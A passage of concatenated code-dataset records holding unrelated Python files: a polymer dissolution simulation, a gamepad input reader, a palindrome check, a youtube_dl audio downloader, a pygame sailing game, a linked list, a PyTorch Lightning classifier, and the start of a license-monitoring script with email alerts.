Dissolution(object):\n \"\"\"\n Dissolution base class\n \"\"\"\n def __init__(self,\n length, nx,\n time_end, nt,\n c_a0, c_ea0, c_t0, c_eae0, c_et0,\n c_a_boundary,\n rho, p_gel, nu, d_a, k0):\n \"\"\"\n class constructor for dissolution simulation\n :param length: length of cube side in meters\n :param nx: number of grid points\n :param time_end: simulation time in minutes\n :param nt: number of time steps\n :param c_a0: initial alcohol concentration\n :param c_ea0: initial concentration\n :param c_t0: 
initial concentration\n :param c_eae0: initial concentration\n :param c_et0: initial concentration\n :param c_a_boundary: alcohol boundary condition\n :param rho: density of polymer\n :param p_gel: gel point of polymer\n :param nu: free molar volume\n :param d_a: diffusion coefficient\n :param k0: reaction rate\n \"\"\"\n self.length = length\n self.nx = nx\n self.time_end = 60.0 * time_end + 60.0 * 60.0\n self.nt = nt\n\n self.c_a0 = c_a0\n self.c_ea0 = c_ea0\n self.c_t0 = c_t0\n self.c_eae0 = c_eae0\n self.c_et0 = c_et0\n self.c_e0 = self.c_et0\n\n self.c_a_boundary = c_a_boundary\n\n self.rho = rho\n self.p_gel = p_gel\n self.nu = nu\n self.d_a = d_a\n self.k0 = k0\n\n self.delta_t = self.time_step()\n self.delta_x = self.space_step()\n\n # self.print_parameters()\n\n if not self.check_stability():\n sys.exit()\n\n self.c_a, self.c_ea, self.c_t, self.c_eae, self.c_et, self.c_e = \\\n self.set_initial_conditions()\n\n self.times, self.space, self.mass = self.run_dissolution()\n self.mass = self.smooth_result()\n\n def smooth_result(self):\n\n mass_smooth = savgol_filter(self.mass, 351, 3)\n\n return mass_smooth\n\n def print_parameters(self):\n print('Cube side length:\\t' +\n str(self.length) + ' meters')\n print('Simulation space step:\\t' +\n str(self.delta_x) + ' meters')\n print('Simulation time:\\t' +\n str(self.time_end) + ' seconds')\n print('Simulation time step:\\t' +\n str(self.delta_t) + ' seconds')\n print('Initial concentration c_a0:\\t' +\n str(self.c_a0) + ' mol/m3')\n print('Initial concentration c_ea0:\\t' +\n str(self.c_ea0) + ' mol/m3')\n print('Initial concentration c_t0:\\t' +\n str(self.c_t0) + ' mol/m3')\n print('Initial concentration c_eae0:\\t' +\n str(self.c_eae0) + ' mol/m3')\n print('Initial concentration c_et0:\\t' +\n str(self.c_et0) + ' mol/m3')\n print('Alcohol boundary concentration:\\t' +\n str(self.c_a_boundary) + ' mol/m3')\n print('Polymer density:\\t' +\n str(self.rho) + ' kg/m3')\n print('Diffusion coefficient:\\t' +\n str(self.d_a) + ' m2/s')\n print('Free volume:\\t' +\n str(self.nu))\n print('Reaction coefficient:\\t' +\n str(self.k0) + 'mol/?')\n print('Simulation stability number:\\t' +\n str(self.calculate_stability()))\n\n def time_step(self):\n \"\"\"\n calculates time step for this class\n :return: time step delta t\n \"\"\"\n return self.time_end / self.nt\n\n def space_step(self):\n \"\"\"\n calculates space step for this class\n :return: space step delta x\n \"\"\"\n return self.length / self.nx\n\n def calculate_stability(self):\n \"\"\"\n calculates stability factor\n :return: stability factor\n \"\"\"\n return self.d_a * self.delta_t / self.delta_x**2\n\n def check_stability(self):\n \"\"\"\n checks whether the problem will be stable\n :return: true or false for stable or unstable\n \"\"\"\n stability_factor = self.calculate_stability()\n if stability_factor > 0.5:\n print('Unstable conditions:\\t' + str(stability_factor))\n print('D_a:\\t' + str(self.d_a))\n print('delta_x:\\t' + str(self.delta_x))\n print('delta_t:\\t' + str(self.delta_t))\n return False\n else:\n return True\n\n def set_initial_conditions(self):\n \"\"\"\n Sets the initial conditions for the concentration\n fields\n :return: initialized concentration field arrays\n \"\"\"\n c_a_temp = self.c_a0 * np.ones((self.nx, ),\n dtype=np.float64)\n c_ea_temp = self.c_ea0 * np.ones((self.nx,),\n dtype=np.float64)\n c_t_temp = self.c_t0 * np.ones((self.nx,),\n dtype=np.float64)\n c_eae_temp = self.c_eae0 * np.ones((self.nx,),\n dtype=np.float64)\n c_et_temp = self.c_et0 * 
np.ones((self.nx,),\n dtype=np.float64)\n c_e_temp = self.c_e0 * np.ones((self.nx, ),\n dtype=np.float64)\n\n c_a_temp[0], c_a_temp[-1] = self.c_a_boundary, self.c_a_boundary\n\n return c_a_temp, c_ea_temp, c_t_temp, c_eae_temp, c_et_temp, c_e_temp\n\n def reaction_rates(self, i):\n old_settings = np.seterr(under='ignore', over='ignore', invalid='ignore')\n # old_settings = np.seterr(under='print', over='print', invalid='print')\n k = self.k0 * self.c_a[i]\n c_a = self.c_a[i]\n c_ea = self.c_ea[i]\n c_t = self.c_t[i]\n c_eae = self.c_eae[i]\n c_et = self.c_et[i]\n\n r_a = -k * c_et * c_a + k * c_ea * c_t - k * c_a * c_eae + k * c_ea**2\n\n r_ea = -k * c_ea * c_t + k * c_et * c_a - k * c_et * c_ea + \\\n k * c_t * c_eae - -2 * k * c_ea**2 + k * c_a * c_eae\n\n r_t = -k * c_ea * c_t + k * c_a * c_et - k * c_t * c_eae + \\\n k * c_et * c_ea\n\n r_eae = -k * c_t * c_eae + k * c_et * c_ea - k * c_a * c_eae + \\\n k * c_ea**2\n\n r_et = -k * c_a * c_et + k * c_ea * c_t - k * c_t * c_eae + \\\n k * c_et * c_ea\n\n return r_a, r_ea, r_t, r_eae, r_et\n\n def calculate_doc(self, c_et, c_e):\n doc = c_et / c_e\n # doc = c_et / self.c_et0\n # doc = c_e / self.c_e0 this one really doesn't work\n return doc\n\n def run_dissolution(self):\n mass_temp = np.ones((self.nt, ),\n dtype=np.float64)\n mass_temp[0] = self.rho * self.length**3\n space_temp = np.linspace(0.0, self.length,\n num=self.nx, dtype=np.float64)\n times_temp = np.linspace(0.0, self.time_end,\n num=self.nt, dtype=np.float64)\n\n for n in range(1, self.nt):\n # store previous solution for update purposes\n #\n c_a_prev = self.c_a\n c_ea_prev = self.c_ea\n c_t_prev = self.c_t\n c_eae_prev = self.c_eae\n c_et_prev = self.c_et\n c_e_prev = self.c_e\n\n # perform the update on the interior first\n #\n for i in range(1, self.nx - 1):\n fac = self.calculate_stability()\n fac2 = 0.0\n r_a, r_ea, r_t, r_eae, r_et = self.reaction_rates(i)\n\n self.c_et[i] = c_et_prev[i] + self.delta_t * r_et\n\n # p = c_et_prev[i] / c_e_prev[i]\n p = self.calculate_doc(c_et_prev[i], c_e_prev[i])\n # check for dissolved nodes\n #\n if p < self.p_gel:\n self.c_a[i] = self.c_a_boundary\n else:\n self.c_a[i] = c_a_prev[i] + \\\n fac * (c_a_prev[i + 1] - 2 * c_a_prev[i] + c_a_prev[i - 1]) + \\\n self.delta_t * r_a\n\n # update other species\n #\n self.c_ea[i] = c_ea_prev[i] + \\\n fac2 * (c_ea_prev[i + 1] - 2 * c_ea_prev[i] + c_ea_prev[i - 1]) + \\\n self.delta_t * r_ea\n\n self.c_t[i] = c_t_prev[i] + \\\n fac2 * (c_t_prev[i + 1] - 2 * c_t_prev[i] + c_t_prev[i - 1]) + \\\n self.delta_t * r_t\n\n self.c_eae[i] = c_eae_prev[i] + \\\n fac2 * (c_eae_prev[i + 1] - 2 * c_eae_prev[i] + c_eae_prev[i - 1]) + \\\n self.delta_t * r_eae\n\n # now do the boundary conditions on the left boundary\n #\n i = 0\n r_a, r_ea, r_t, r_eae, r_et = self.reaction_rates(i)\n\n self.c_et[i] = c_et_prev[i] + self.delta_t * r_et\n\n self.c_a[i] = self.c_a_boundary\n\n self.c_ea[i] = c_ea_prev[i] + \\\n 2 * fac2 * (c_ea_prev[i+1] - c_ea_prev[i]) + \\\n self.delta_t * r_ea\n self.c_t[i] = c_t_prev[i] + \\\n 2 * fac2 * (c_t_prev[i+1] - c_t_prev[i]) + \\\n self.delta_t * r_t\n self.c_eae[i] = c_eae_prev[i] + \\\n 2 * fac2 * (c_eae_prev[i+1] - c_eae_prev[i]) + \\\n self.delta_t * r_eae\n\n # now do the boundary conditions on the right boundary\n #\n i = self.nx - 1\n r_a, r_ea, r_t, r_eae, r_et = self.reaction_rates(i)\n\n self.c_et[i] = c_et_prev[i] + self.delta_t * r_et\n\n self.c_a[i] = self.c_a_boundary\n\n self.c_ea[i] = c_ea_prev[i] + \\\n 2 * fac2 * (c_ea_prev[i-1] - c_ea_prev[i]) + \\\n 
self.delta_t * r_ea\n self.c_t[i] = c_t_prev[i] + \\\n 2 * fac2 * (c_t_prev[i-1] - c_t_prev[i]) + \\\n self.delta_t * r_t\n self.c_eae[i] = c_eae_prev[i] + \\\n 2 * fac2 * (c_eae_prev[i-1] - c_eae_prev[i]) + \\\n self.delta_t * r_eae\n\n # update global esther concentration array\n #\n self.c_e = 2 * self.c_eae + self.c_ea + self.c_et\n\n # now calculate the mass loss/gain\n #\n mass_temp[n] = 0.0\n for i in range(1, self.nx - 2):\n # p = self.c_et[i] / self.c_et0\n p = self.calculate_doc(c_et_prev[i], c_e_prev[i])\n\n if p < self.p_gel:\n self.c_a[i] = self.c_a_boundary\n\n swelling_ratio = (self.rho * (1.0 + self.nu * self.c_a[i]))**(1.0/3.0)\n total_rho = self.rho * swelling_ratio\n\n if p >= self.p_gel:\n mass_temp[n] = mass_temp[n] + swelling_ratio * self.delta_x\n\n mass_temp[n] = mass_temp[n] ** 3\n\n return times_temp / 60.0, space_temp, mass_temp / mass_temp[0]\n","sub_path":"BER_paper_2/python/dissolution_class.py","file_name":"dissolution_class.py","file_ext":"py","file_size_in_byte":14778,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"}
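The `check_stability` guard above enforces the standard explicit (FTCS) diffusion criterion D·Δt/Δx² ≤ 0.5. A worked check with illustrative numbers (these parameter values are made up, not the record's):

```python
# Explicit diffusion updates are stable only when D * dt / dx**2 <= 0.5.
length, nx = 0.01, 100           # 1 cm specimen, 100 grid points
time_end, nt = 3600.0, 200_000   # one hour of simulated time
d_a = 1e-10                      # diffusion coefficient, m^2/s

dx = length / nx
dt = time_end / nt
stability = d_a * dt / dx**2
print(stability, stability <= 0.5)  # 0.00018 True -> stable
```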
+{"seq_id":"456624448","text":"import inputs\nfrom decimal import Decimal\n\ndef getXYZ(prev_coord, prev_gradient):\n \"\"\"\n Returns an integer x,y,z vector from the current controller inputs.\n Allows for continuous controller inputs, or simulates that at least.\n \"\"\"\n speed = 0.01 # Controls the speed the controller outputs change.\n null_zone = 0 # Controls the null margin for the controller.\n\n events = inputs.get_gamepad()\n gradient = prev_gradient\n\n for event in events:\n # print(event.ev_type, event.code, event.state)\n type = str(event.ev_type)\n code = str(event.code)\n state = int(event.state)\n\n if (type == \"Absolute\"):\n state = (state - 127.5) / 127.5 * speed\n\n if (abs(state) < null_zone):\n state = 0\n\n if (code == \"ABS_X\"):\n gradient[0] = state\n elif (code == \"ABS_Y\"):\n gradient[1] = -state\n elif (code == \"ABS_RZ\"):\n gradient[2] = -state\n\n new_coord = [0,0,0]\n for i in range(3):\n new_coord[i] = prev_coord[i] + gradient[i]\n return new_coord, gradient\n\ndef main():\n coord = (0,0,0)\n gradient = (0,0,0)\n while 1:\n coord, gradient = getXYZ(coord, gradient)\n print(coord, gradient)\n\nif __name__ == '__main__':\n\tmain()\n","sub_path":"ControllerXYZ_Rotation.py","file_name":"ControllerXYZ_Rotation.py","file_ext":"py","file_size_in_byte":1331,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"}
+{"seq_id":"49827385","text":"# Determine whether an integer is a palindrome.\n# An integer is a palindrome when it reads the same backward as forward.\n#\n# Example 1:\n#\n# Input: 121\n# Output: true\n#\n# Example 2:\n#\n# Input: -121\n# Output: false\n# Explanation: From left to right, it reads -121. From right to left, it becomes 121-.\n# Therefore it is not a palindrome.\n#\n# Example 3:\n#\n# Input: 10\n# Output: false\n# Explanation: Reads 01 from right to left. Therefore it is not a palindrome.\n\nimport math\n\n\nclass Solution:\n\n def is_palindrome(self, x: int) -> bool:\n if 0 <= x < 10:\n return True\n elif x < 0:\n return False\n else:\n\n digits = int(math.log10(x)) + 1\n number = x\n\n result = 0\n\n while number % 10 != number:\n temp = number % 10 * pow(10, digits - 1)\n digits -= 1\n result += temp\n number = number // 10\n\n return result + number == x\n","sub_path":"easy/PalindromNumber.py","file_name":"PalindromNumber.py","file_ext":"py","file_size_in_byte":972,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"59960875","text":"from __future__ import unicode_literals\nimport youtube_dl\n\n\n'''\nEach line should consist of a url starting with http...\nie http://www.youtube.com/?watch=whatever\n http....\n http...\nThe titles of each mp3 file will be the same as their respective videos of origin.\n'''\nfname = 'path-to-your-txt-file'\n\n#youtube_dl settings\n\nydl_opts = {\n 'format': 'bestaudio/best',\n 'postprocessors': [{\n 'key': 'FFmpegExtractAudio',\n 'preferredcodec': 'mp3',\n 'preferredquality': '192',\n }],\n}\n\ndef separate(line):\n\t#this separates the url and the identifying information, which will be used as the file title\n\t#returns title, url\n\t#if there is no title, it will still return the url along with a blank string as the title\n\t\n\n\ttitle, url = line.split('http')\n\ttry:\n\t\treturn title, 'http' + url\n\texcept:\n\t\ttry:\n\t\t\treturn '', 'http' + url\n\t\texcept:\n\t\t\tprint('file line is not formatted correctly:' + line)\n\ndef download_this_list(list):\n\t#takes a list of titles and urls or just urls\n\t#downloads all videos and extracts mp3's\n\n\tfor x in content:\n\t\ttitle, url = separate(x)\n\t\twith youtube_dl.YoutubeDL(ydl_opts) as ydl:\n\t\t ydl.download([url]) \n\n#grabbing the file... (which should consist of titles + the video url or just the urls of each video, one url per line\nwith open(fname) as f:\n\tcontent = f.readlines()\n\ncontent = [x.strip() for x in content] \n\ndownload_this_list(content)\n","sub_path":"youtube-downloader.py","file_name":"youtube-downloader.py","file_ext":"py","file_size_in_byte":1400,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"518621441","text":"# SOURCE FOR CODE AND KNOWLEDGE\n# https://www.101computing.net/getting-started-with-pygame/\n# casey & sander you can do next on the website to reach the other parts\n\nimport pygame, random\n#Let's import the Boat Class\nfrom boat import Boat\npygame.init()\n\n#colors\nGREEN = (20, 255, 140)\nGREY = (210, 210 ,210)\nWHITE = (255, 255, 255)\nRED = (255, 0, 0)\nPURPLE = (255, 0, 255)\nBLACK = ( 0, 0, 0)\nWATER = (68, 183, 255)\nBLUE = (0, 0, 255)\nYELLOW = (255, 255, 63)\n\nSCREENWIDTH=1850\nSCREENHEIGHT=1025\n\nsize = (SCREENWIDTH, SCREENHEIGHT)\nscreen = pygame.display.set_mode(size)\npygame.display.set_caption(\"Sailing Simulation\")\n\n#Wind-Text Properties\n#Wind\nfont = pygame.font.Font(None, 52)\ntext = font.render(\"Wind\", 1, WHITE)\nwind = pygame.image.load(\"images/WindArrow.png\")\nwind = pygame.transform.scale(wind, (200, 120))\n\n#This will be a list that will contain all the sprites we intend to use in our game.\nall_sprites_list = pygame.sprite.Group()\n\nBoat1 = Boat(BLUE, 20, 30)\nBoat1.rect.x = 200\nBoat1.rect.y = 300\n\n# Add the car to the list of objects\nall_sprites_list.add(Boat1)\n\n#Allowing the user to close the window...\ncarryOn = True\nclock=pygame.time.Clock()\n\nwhile carryOn:\n for event in pygame.event.get():\n if event.type==pygame.QUIT:\n carryOn=False\n elif event.type==pygame.KEYDOWN:\n if event.key==pygame.K_x: #Pressing the x Key will quit the game\n carryOn=False\n\n keys = pygame.key.get_pressed()\n if keys[pygame.K_LEFT]:\n Boat1.moveLeft(1)\n if keys[pygame.K_RIGHT]:\n Boat1.moveRight(1)\n if keys[pygame.K_UP]:\n Boat1.moveUp(1)\n if keys[pygame.K_DOWN]:\n Boat1.moveDown(1)\n if keys[pygame.K_COMMA]:\n #Boat1.rot_center(5)\n print(type(Boat1.rot_center(5)))\n #Game Logic\n all_sprites_list.update()\n\n #Drawing on Screen\n screen.fill(WATER)\n\n #Draw The Buoys\n pygame.draw.circle(screen, RED, [1600,312],15, 0)\n pygame.draw.circle(screen, RED, [330,512],15, 0)\n pygame.draw.circle(screen, RED, [1600,712],15, 0)\n\n #Wind - Text\n screen.blit(text, (65,455))\n screen.blit(wind, (10,452))\n\n\n\n #Now let's draw all the sprites in one go. (For now we only have 1 sprite!)\n all_sprites_list.draw(screen)\n\n #Refresh Screen\n pygame.display.flip()\n\n #Number of frames per secong e.g. 60\n clock.tick(60)\n\npygame.quit()\n","sub_path":"Final_Blind_Sailing/Previous_Work/blindsail.py","file_name":"blindsail.py","file_ext":"py","file_size_in_byte":2509,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"257539534","text":"from solution import Solution\nfrom solution import ListNode\n\nsolution = Solution()\n\n# data = [-11, -3, -6, 12, -15, -13, -7, -3, 13, -2, -10, 3, 12, -12, 6, -6, 12, 9, -2, -12, 14, 11, -4, 11, -8, 8, 0,\n# -12, 4, -5, 10, 8, 7, 11, -3, 7, 5, -3, -11, 3, 11, -13, 14, 8, 12, 5, -12, 10, -8, -7, 5, -9, -11, -14, 9, -12,\n# 1, -6, -8, -10, 4, 9, 6, -3, -3, -12, 11, 9, 1, 8, -10, -3, 2, -11, -10, -1, 1, -15, -6, 8, -7, 6, 6, -10, 7, 0,\n# -7, -7, 9, -8, -9, -9, -14, 12, -5, -10, -15, -9, -15, -7, 6, -10, 5, -7, -14, 3, 8, 2, 3, 9, -12, 4, 1, 9, 1,\n# -15, -13, 9, -14, 11, 9]\n# data = [-4,-1,-4,0,2,-2,-4,-3,2,-3,2,3,3,-4]\n# data = [0, 3, 0, 1, 1, -1, -5, -5, 3, -3, -3, 0]\n# data = [-1, 0, 1, 2, -1, -4]\n# result = solution.threeSum(data)\n\n# print(solution.threeSumClosest([-1,2,1,-4],1))\n\n# print(solution.letterCombinations(\"234\"))\n\n# print(solution.maxCoins([3, 1, 5, 8]))\n\n# print(\"isValid={}\".format(solution.isValid(\"(]\")))\n# print(\"isValid={}\".format(solution.isValid(\"()\")))\n# print(\"isValid={}\".format(solution.isValid(\"\")))\n# print(\"isValid={}\".format(solution.isValid(\"[(){}]\")))\n# print(\"isValid={}\".format(solution.isValid(\"[(){}]()\")))\n\nhead1 = ListNode()\nlist1 = head1\nlist1.val = 1\nlist1.next = ListNode()\nlist1 = list1.next\nlist1.val = 3\nlist1.next = ListNode()\nlist1 = list1.next\nlist1.val = 5\n\nhead2 = ListNode()\nlist2 = head2\nlist2.val = 2\nlist2.next = ListNode()\nlist2 = list2.next\nlist2.val = 4\nlist2.next = ListNode()\nlist2 = list2.next\nlist2.val = 6\n\n\nresult = solution.mergeTwoLists(head1,head2)\nprint(result)\n\nresult = solution.generateParenthesis(3)\nprint(result)\n\nresult = solution.generateParenthesis_2(3)\nprint(result)\n\nresult = solution.generateParenthesis_1(3)\nprint(result)\n\n","sub_path":"src/leetcode/solution_test.py","file_name":"solution_test.py","file_ext":"py","file_size_in_byte":1730,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"474969891","text":"# This file replaces experiment/train.py\n\nfrom typing import Any, List\n\nimport torch\nfrom pytorch_lightning import LightningModule\nfrom torchmetrics.classification.accuracy import Accuracy\nfrom hydra.utils import instantiate\nimport torchvision\nfrom src.models.modules.head import mark_classifier\nimport torch.nn.functional as F\n\n\nclass ClassificationTraining(LightningModule):\n \"\"\"\n Example of LightningModule for MNIST classification.\n\n A LightningModule organizes your PyTorch code into 5 sections:\n - Computations (init).\n - Train loop (training_step)\n - Validation loop (validation_step)\n - Test loop (test_step)\n - Optimizers (configure_optimizers)\n\n Read the docs:\n https://pytorch-lightning.readthedocs.io/en/latest/common/lightning_module.html\n \"\"\"\n\n def __init__(\n self,\n module,\n optim,\n training,\n pruning,\n run_id=None,\n **kwargs\n ):\n super().__init__()\n\n # this line ensures params passed to LightningModule will be saved to ckpt\n # it also allows to access params with 'self.hparams' attribute\n self.save_hyperparameters()\n print(self.hparams)\n\n self.test_counter = 0\n\n self.module = instantiate(next(iter(self.hparams.module.values())))\n print(self.module)\n if hasattr(torchvision.models, next(iter(self.hparams.module.values()))._target_.split('.')[-1]):\n print(f\"\\n\\n\\n---------{next(iter(self.hparams.module.values()))._target_.split('.')[-1]}-------\\n\\n\\n\")\n # https://pytorch.org/docs/stable/torchvision/models.html\n mark_classifier(self.module) # add is_classifier attribute\n # Todo: Check if the model is compatible\n\n # loss function\n self.criterion = torch.nn.CrossEntropyLoss()\n\n # use separate metric instance for train, val and test step\n # to ensure a proper reduction over the epoch\n self.train_accuracy = Accuracy()\n self.val_accuracy = Accuracy()\n self.test_accuracy = Accuracy()\n self.train_accuracy5 = Accuracy(top_k=5)\n self.val_accuracy5 = Accuracy(top_k=5)\n self.test_accuracy5 = Accuracy(top_k=5)\n\n def forward(self, x: torch.Tensor):\n return self.module(x)\n\n def step(self, batch: Any):\n x, y = batch\n logits = self.forward(x)\n loss = self.criterion(logits, y)\n preds = torch.argmax(logits, dim=1)\n logits = F.softmax(logits)\n return loss, logits, preds, y\n\n def training_step(self, batch: Any, batch_idx: int):\n loss, logits, _, targets = self.step(batch)\n\n run_id = self.hparams.run_id + '/train' if self.hparams.run_id else 'train'\n # log train metrics\n try:\n acc = self.train_accuracy(logits, targets)\n except:\n acc = 0\n try:\n acc5 = self.train_accuracy5(logits, targets)\n except:\n acc5 = 0\n self.log(f\"{run_id}/loss\", loss, on_step=False, on_epoch=True, prog_bar=False)\n self.log(f\"{run_id}/acc\", acc, on_step=False, on_epoch=True, prog_bar=True)\n self.log(f\"{run_id}/acc5\", acc5, on_step=False, on_epoch=True, prog_bar=True)\n\n # we can return here dict with any tensors\n # and then read it in some callback or in training_epoch_end() below\n # remember to always return loss from training_step, or else backpropagation will fail!\n return {\"loss\": loss}\n\n def training_epoch_end(self, outputs: List[Any]):\n # `outputs` is a list of dicts returned from `training_step()`\n pass\n\n def validation_step(self, batch: Any, batch_idx: int):\n loss, logits, _, targets = self.step(batch)\n\n run_id = self.hparams.run_id + '/val' if self.hparams.run_id else 'val'\n # log val metrics\n try:\n acc = self.val_accuracy(logits, targets)\n except:\n acc = 0\n try:\n 
acc5 = self.val_accuracy5(logits, targets)\n except:\n acc5 = 0\n self.log(f\"{run_id}/loss\", loss, on_step=False, on_epoch=True, prog_bar=False)\n self.log(f\"{run_id}/acc\", acc, on_step=False, on_epoch=True, prog_bar=True)\n self.log(f\"{run_id}/acc5\", acc5, on_step=False, on_epoch=True, prog_bar=True)\n\n return {\"loss\": loss}\n\n def validation_epoch_end(self, outputs: List[Any]):\n pass\n\n def test_step(self, batch: Any, batch_idx: int):\n loss, logits, preds, targets = self.step(batch)\n\n # log test metrics\n acc = self.test_accuracy(logits, targets)\n acc5 = self.test_accuracy5(logits, targets)\n state = \"before_pruning\" if self.test_counter % 2 == 0 else \"after_pruning\"\n\n self.log(f\"{self.hparams.run_id}/test-{state}/loss\", loss, on_step=False, on_epoch=True)\n self.log(f\"{self.hparams.run_id}/test-{state}/acc\", acc, on_step=False, on_epoch=True)\n self.log(f\"{self.hparams.run_id}/test-{state}/acc5\", acc5, on_step=False, on_epoch=True)\n\n return {\"loss\": loss, \"preds\": preds, \"targets\": targets}\n\n def test_epoch_end(self, outputs: List[Any]):\n pass\n\n def configure_optimizers(self):\n \"\"\"Choose what optimizers and learning-rate schedulers to use in your optimization.\n Normally you'd need one. But in the case of GANs or similar you might have multiple.\n\n See examples here:\n https://pytorch-lightning.readthedocs.io/en/latest/common/lightning_module.html#configure-optimizers\n \"\"\"\n return instantiate(next(iter(self.hparams.optim.values())), params=self.module.parameters(), _convert_=\"partial\")\n\n def on_fit_end(self) -> None:\n expr = self.logger.experiment[0]\n expr.summary[f\"{self.hparams.run_id}/best_score\"] = self.trainer.checkpoint_callback.best_model_score\n","sub_path":"src/models/classification_training.py","file_name":"classification_training.py","file_ext":"py","file_size_in_byte":5860,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"}
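The module above logs both top-1 and top-5 accuracy via `torchmetrics.Accuracy(top_k=5)`. A NumPy sketch of what the top-k metric measures at its core (torchmetrics also handles batching, averaging, and distributed reduction, which this omits):

```python
import numpy as np

def top_k_accuracy(probs, targets, k=5):
    """Fraction of rows whose target class is among the k highest-scoring classes."""
    topk = np.argsort(probs, axis=1)[:, -k:]  # indices of the k best classes per row
    hits = [t in row for t, row in zip(targets, topk)]
    return float(np.mean(hits))

probs = np.array([[0.1, 0.2, 0.3, 0.15, 0.05, 0.2],
                  [0.5, 0.1, 0.1, 0.1, 0.1, 0.1]])
print(top_k_accuracy(probs, np.array([4, 0]), k=2))  # 0.5: only the second row hits
```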
+{"seq_id":"420059887","text":"from Node import Node\n\n\ndef default_sorting_eval(data):\n \"\"\"\n gets only the raw data! not an node object!!!\n :param data: node.get_data()\n :return: evaluated representation of data\n \"\"\"\n return data\n\n\ndef default_search_eval(data):\n \"\"\"\n gets only the raw data! not an node object!!!\n :param data: node.get_data()\n :return: evaluated representation of data\n \"\"\"\n return data\n\n\nclass LinkedList:\n\n def __init__(self):\n self.head = None\n\n def __iter__(self):\n tmp = self.head\n while tmp is not None:\n yield tmp\n tmp = tmp.get_next()\n\n def clear(self):\n self.head = None\n\n def attach(self, data):\n self.head = Node(data, self.head)\n\n def attach_sorted(self, data, key=default_sorting_eval):\n # special case: empty list, just insert new node\n if self.head is None:\n return self.attach(data)\n\n # special case: new ist bigger than head\n if key(data) >= key(self.head.get_data()):\n return self.attach(data)\n\n # normal case (also handles special case where it new_node only fits to the end):\n new_node, next_node = Node(data), self.head\n # search for corresponding gap in LL\n while (next_node.get_next() is not None) \\\n and \\\n not (key(next_node.get_data()) >= key(new_node.get_data()) >= key(next_node.get_next().get_data())):\n next_node = next_node.get_next()\n\n new_node.set_next(next_node.get_next()) # print(\"found next_node is %s\" % next_node)\n next_node.set_next(new_node)\n\n def search(self, my_key_data, key=default_sorting_eval):\n for node in self:\n if my_key_data == key(node.get_data()):\n return node\n raise AttributeError\n\n def delete(self, my_key_data, key=default_sorting_eval): # deletes all found, returns list of deleted nodes\n ret = [] # list of deleted elements\n\n # special case: head should be deleted (and the following new heads...):\n while my_key_data == key(self.head.get_data()):\n ret.append(self.head)\n self.head = self.head.get_next()\n\n # normal case:\n next_node = self.head # self.head is now a \"not to be deleted node\"\n while next_node is not None and next_node.get_next() is not None: # 1. part is because of deleted nodes\n if my_key_data == key(next_node.get_next().get_data()): # find matching node\n ret.append(next_node.get_next())\n next_node.set_next(next_node.get_next().get_next())\n next_node = next_node.get_next()\n return ret\n\n\nif __name__ == \"__main__\":\n ll = LinkedList()\n\n for i in [1, 2, 3, 4, 5, 6, 7]:\n ll.attach_sorted(i)\n\n print(\"ok\")\n ll.attach_sorted(8)\n ll.attach_sorted(3.5)\n ll.attach_sorted(0)\n print(\"ok2\")\n\n for itm in ll:\n print(itm)\n\n try:\n print(\"search for 3: \", end=\"\")\n print(ll.search(3))\n print(\"search for 13.37: \", end=\"\")\n print(ll.search(13.37))\n except AttributeError:\n print(\"Not found!!!\")\n\n print(\"###################\")\n\n print(\"Deleting: \")\n print(\"deleted: %s\" % ll.delete(8))\n print(\"deleted: %s\" % ll.delete(3.5))\n print(\"deleted: %s\" % ll.delete(0))\n\n for itm in ll:\n print(itm)\n","sub_path":"LinkedList.py","file_name":"LinkedList.py","file_ext":"py","file_size_in_byte":3359,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"}
+{"seq_id":"335319142","text":"from encryption import encrypto\r\nimport configparser\r\nimport datetime\r\nimport sqlite3\r\nimport logging\r\nimport smtplib\r\n\r\ndef get_parser():\r\n config = configparser.ConfigParser()\r\n\r\n return config\r\n\r\ndef get_encrypt():\r\n #create encrypt object\r\n key_object = encrypto('secret.key')\r\n\r\n return key_object\r\n\r\ndef get_logger():\r\n #creates logger object\r\n logger = logging.getLogger(__name__)\r\n \r\n return logger\r\n\r\ndef set_logger(logger):\r\n #set log level\r\n logger.setLevel(logging.INFO)\r\n\r\n #define file handler and set formatter\r\n file_handler = logging.FileHandler('raisensu_log.log')\r\n formatter = logging.Formatter('%(asctime)s : %(levelname)s : %(name)s : %(message)s')\r\n file_handler.setFormatter(formatter)\r\n\r\n #add file handler to logger\r\n logger.addHandler(file_handler)\r\n\r\ndef get_smtp_state(config):\r\n #read in monitor_settings file for SMTP objects\r\n config.read('monitor_settings.ini')\r\n\r\n smtpState = config['email']['enable_email'].upper()\r\n\r\n return smtpState \r\n\r\ndef get_smtp(config):\r\n #read in monitor_settings file for SMTP objects\r\n config.read('monitor_settings.ini')\r\n\r\n smtpServer = config['email']['smtp_server']\r\n smtpObj = smtplib.SMTP(smtpServer)\r\n\r\n return smtpObj\r\n\r\ndef set_smtp(notify, config):\r\n #read in monitor_settings file for SMTP objects\r\n config.read('monitor_settings.ini')\r\n\r\n receiver_email = config['email']['receiver_email']\r\n sender_email = config['email']['sender_email']\r\n\r\n message = '''From: <{}>\r\n To: [{}]\r\n MIME-Version: 1.0\r\n Content-type: text/html\r\n Subject: [ALERT] Raisensu License Asset Monitoring\r\n {}\r\n '''.format(sender_email, receiver_email, notify)\r\n\r\n return message\r\n\r\ndef send_smtp(smtpObj, message, config):\r\n #read in monitor_settings file for SMTP objects\r\n config.read('monitor_settings.ini')\r\n\r\n receiver_email = config['email']['receiver_email']\r\n sender_email = config['email']['sender_email']\r\n\r\n smtpObj.sendmail(sender_email, receiver_email, message)\r\n\r\n \r\ndef diff_dates(date_today, comp_date):\r\n #convert comp_date to date object\r\n date_time_today = datetime.datetime.strptime(date_today, '%m/%d/%Y')\r\n date_time_comp = datetime.datetime.strptime(comp_date, '%m/%d/%Y')\r\n\r\n #return remaining days\r\n return abs(date_time_comp - date_time_today).days\r\n\r\n\r\ndef get_sql_statement(config, key_object, logger):\r\n #Read 